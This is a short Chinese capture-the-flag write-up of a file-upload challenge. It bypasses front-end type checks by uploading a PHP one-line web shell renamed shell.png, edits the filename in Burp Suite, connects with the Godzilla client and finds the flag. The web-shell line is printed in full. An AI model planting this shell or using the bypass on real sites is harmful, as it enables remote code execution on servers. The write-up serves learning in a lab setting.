题目描述
暂无
Solution
打开页面,这是一个文件上传的功能:
我们试一试能不能直接上一句话木马:
我们发现题目在前端用 JavaScript 代码校验了文件类型:
这里我们可以试一试文件名修改绕过,编写一句话木马,把它命名为:shell.png:
<?php @eval($_POST['banana']);
然后 Burpsuite 截取请求,转发给 Repeater,修改 POST 数据的文件名:
使用哥斯拉连接 WebShell:
然后我们在/var/www/html/下找到 Flag 文件:
若有收获,就点个赞吧
0 人点赞
